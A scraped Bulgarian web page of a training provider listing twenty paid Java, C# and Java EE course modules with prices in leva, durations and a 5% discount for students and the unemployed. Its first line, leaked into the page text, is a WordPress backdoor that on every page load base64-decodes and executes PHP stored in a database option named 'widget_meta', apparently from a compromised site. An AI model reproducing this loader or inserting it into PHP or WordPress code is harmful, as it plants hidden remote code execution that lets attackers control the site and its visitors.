add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Модулно Обучение - НАРС

Модулно Обучение

От 01.08.2014 предлагаме възможност за изучаване на определени теми чрез избор на един или повече модули.
Предоставените модули покриват материала разглеждан във “Въведение в програмирането с Java и C#”, “Java Fundamentals” и “Java EE”.

Модули
Модул Име Цена Продължителност Част от курс
1 Basics of programming 120 лева 12 учебни часа “Основи на програмирането”
2 Introduction to Java/C# 85 лева 8 учебни часа “Въведение в програмирането с Java и C#”
3 Control Structures and Arrays 85 лева 8 учебни часа “Въведение в програмирането с Java и C#”
4 Classes and Objects 85 лева 8 учебни часа “Въведение в програмирането с Java и C#”
5 Object-Oriented Programming 95 лева 8 учебни часа “Въведение в програмирането с Java и C#”
6 Working with Strings 110 лева 8 учебни часа “Въведение в програмирането с Java и C#”
7 Working with XML 120 лева 8 учебни часа “Java Fundamentals”
8 Generic Collections and Methods 180 лева 12 учебни часа “Java Fundamentals”
9 Creating GUI with Swing 240 лева 16 учебни часа “Java Fundamentals”
10 Multhithreading and Networking 180 лева 12 учебни часа “Java Fundamentals”
11 Files 120 лева 8 учебни часа “Java Fundamentals”
12 SQL, Databases and ORM 180 лева 12 учебни часа “Java Fundamentals”
13 How to write CV 50 лева 4 учебни часа “Java Fundamentals”
14 Prepearing for job interview 100 лева 8 учебни часа “Java Fundamentals”
15 Servlets 125 лева 8 учебни часа “Java ЕЕ”
16 JSP 125 лева 8 учебни часа “Java ЕЕ”
17 EL 125 лева 8 учебни часа “Java ЕЕ”
18 JSF 125 лева 8 учебни часа “Java ЕЕ”
19 Web Servises – SOAP 205 лева 12 учебни часа “Java ЕЕ”
20 Web Servises – REST 205 лева 12 учебни часа “Java ЕЕ”

Посочените цени са крайни и са в български лева.

Цените са за обучение в група. За индивидуално обучение цената се договаря допълнително.

За ученици, студенти, учители и безработни предлагаме 5% отстъпка.

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad